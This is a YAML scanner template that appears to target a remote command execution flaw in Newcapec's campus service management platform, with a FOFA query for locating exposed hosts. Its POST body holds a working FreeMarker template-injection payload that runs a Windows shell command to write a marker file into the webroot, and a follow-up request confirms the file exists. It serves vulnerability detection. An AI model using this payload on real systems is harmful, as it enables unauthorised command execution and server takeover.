id: newcapec-service-action-rce

info:
  name: 新开普 前置服务管理平台 service.action 远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    新开普 前置服务管理平台 service.action 接口存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限
    FOFA: title="掌上校园服务管理平台"
  tags: newcapec,rce
  created: 2023/09/05

set:
  randstr: randomLowercase(6)
  randbody: randomLowercase(32)
rules:
  r0:
    request:
      method: POST
      path: /service_transport/service.action
      headers:
        Content-Type: application/json
      body: |
        {"command":"GetFZinfo","UnitCode":"<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo {{randbody}} > ./webapps/ROOT/{{randstr}}.txt\")}"}
    expression: response.status == 200 && response.body.bcontains(b'"_result":')
  r1:
    request:
      method: GET
      path: /{{randstr}}.txt
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()